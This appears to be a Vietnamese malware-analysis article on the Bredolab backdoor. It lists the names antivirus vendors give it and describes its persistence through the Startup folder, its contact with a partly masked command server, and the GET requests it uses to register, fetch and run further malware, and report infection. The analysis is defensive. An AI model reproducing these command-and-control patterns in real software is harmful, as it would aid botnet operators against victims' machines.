Tìm hiểu về phần mềm độc hại

Backdoor.Win32.Bredolab.euaNhững chương trình như này thường được sử dụng để liên kết những nhóm máy tính bị lây nhiễm để tạo nên mô hình mạng botnet hoặc zombie thường gặp. Và những kẻ đứng đằng sau tổ chức này có thể dễ dàng tập trung 1 số lượng lớn hoặc rất lớn các máy tính – lúc này đã trở thành công cụ cho tin tặc, nhằm thực hiện những âm mưu hoặc mục đích xấu.1 bộ phận khác của Backdoor cũng có khả năng lây lan và hoạt động giống hệt với Net-Worm, chúng ta có thể phân biệt...
Nội dung trích xuất từ tài liệu:
Tìm hiểu về phần mềm độc hại Tìm hiểu về phần mềm độc hại Backdoor.Win32.Bredolab.euaNhững chương trình như này thường được sử dụng để liên kết những nhóm máytính bị lây nhiễm để tạo nên mô hình mạng botnet hoặc zombie thường gặp. Vànhững kẻ đứng đằng sau tổ chức này có thể dễ dàng tập trung 1 số lượng lớn hoặcrất lớn các máy tính – lúc này đã trở thành công cụ cho tin tặc, nhằm thực hiệnnhững âm mưu hoặc mục đích xấu.1 bộ phận khác của Backdoor cũng có khả năng lây lan và hoạt động giống hệtvới Net-Worm, chúng ta có thể phân biệt chúng qua khả năng lây lan, Backdoorkhông thể tự nhân bản và lây lan, trái ngược hoàn toàn với Net-Worm. Nhưng chỉcần nhận được lệnh đặc biệt từ phía tin tặc, chúng sẽ đồng loạt lây lan và sản sinhvới số lượng không thể kiểm soát được.Tại bài viết này, chúng ta sẽ cùng thảo luận vềmẫu Backdoor.Win32.Bredolab.eua (được đặt tên bởi Kaspersky), hoặc cònđược biết đến dưới tên gọi:- Trojan: Bredolab!n (McAfee)- Mal/BredoPk-B (Sophos)- Trj/Sinowal.DW (Panda)- TrojanDownloader:Win32/Bredolab.AA (MS(OneCare))- Trojan.Botnetlog.126 (DrWeb)- Win32/TrojanDownloader.Bredolab.BE trojan (Nod32)- Trojan.Downloader.Bredolab.EK (BitDef7)- Backdoor.Bredolab.CNS (VirusBuster)- Trojan.Win32.Bredolab (Ikarus)- Cryptic.AGF (AVG)- TR/Crypt.XPACK.Gen (AVIRA)- W32/Bredolab.TP (Norman)- Trojan.Win32.Generic.521C7EF8 (Rising)- Backdoor.Win32.Bredolab.eua [AVP] (FSecure)- Trojan-Downloader.Win32.Bredolab (Sunbelt)- Backdoor.Bredolab.CNS (VirusBusterBeta)Chúng được phát hiện vào ngày 3/6/2010 lúc 16:16 GMT, “rục rịch” hoạt động tại4/6/2010 lúc 03:28 GMT, và các thông tin phân tích chi tiết được đăng tải vàongày 12/7/2010 lúc 11:33 GMT.Miêu tả chi tiết về mặt kỹ thuậtVề bản chất, những chương trình mã độc như thế này thường được quản lý bởiserver riêng, và có nhiệm vụ tải các malware khác về máy tính đã bị lây nhiễm.Như tất cả các chương trình độc hại khác, chúng tự kích hoạt cơ chế khởi độngcùng hệ thống bằng cách copy file thực thi vào thư mục autorun:%Startup%siszpe32.exevà tạo ra những file có dạng như sau:%appdata%avdrn.datVề phương thức Payload, chúng thường xuyên kết nối tới server:http://*****lo.runơi chúng gửi đi những yêu cầu như sau:GET /new/controller.php?action=bot&entity_list=&uid=&first=1&guid=880941764&v=15&rnd=8520045Và kết quả là chương trình sẽ nhận lại lệnh, mã cụ thể để tải các ứng dụngmalware khác, chúng sẽ được lưu tại thư mục sau và tự động kích hoạt:%windir%Temp.exeSau đó chúng tiếp tục gửi đi những yêu cầu khác:GET /new/controller.php?action=report&guid=0&rnd=8520045&guid=&entity=1260187840:unique_start;1260188029:unique_start;1260433697:unique_start;1260199741:unique_startnhững dữ liệu này thông báo với hệ thống server rằng máy tính của nạn nhân đã bịlây nhiễm.